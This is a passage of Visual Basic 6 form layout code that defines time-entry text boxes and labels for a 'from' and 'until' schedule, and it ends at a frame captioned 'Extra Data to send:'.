Enabled = 0 'False Height = 285 Left = 120 TabIndex = 23 Text = "12" ToolTipText = "start hours" Top = 480 Width = 375 End Begin VB.TextBox txtampm Height = 285 Left = 1920 TabIndex = 20 Text = "AM" ToolTipText = "am/pm" Top = 1080 Width = 375 End Begin VB.TextBox txtsecond Height = 285 Left = 1320 TabIndex = 6 Text = "00" ToolTipText = "seconds" Top = 1080 Width = 375 End Begin VB.TextBox txtminute Height = 285 Left = 720 TabIndex = 5 Text = "06" ToolTipText = "minutes" Top = 1080 Width = 375 End Begin VB.TextBox txthour Height = 285 Left = 120 TabIndex = 4 Text = "06" ToolTipText = "hours" Top = 1080 Width = 375 End Begin VB.Label Label16 Caption = ":" Height = 255 Left = 1200 TabIndex = 26 Top = 480 Width = 135 End Begin VB.Label Label15 Caption = ":" Height = 255 Left = 600 TabIndex = 24 Top = 480 Width = 135 End Begin VB.Label Label14 Caption = "from" Height = 255 Left = 120 TabIndex = 22 Top = 240 Width = 615 End Begin VB.Label Label12 Caption = ":" Height = 255 Left = 1200 TabIndex = 19 Top = 1080 Width = 135 End Begin VB.Label Label11 Caption = ":" Height = 255 Left = 600 TabIndex = 18 Top = 1080 Width = 135 End Begin VB.Label Label3 Caption = "until:" Height = 255 Left = 120 TabIndex = 3 Top = 840 Width = 975 End End Begin VB.Frame Frame5 Caption = "Extra Data to send:" Height = 3015 Left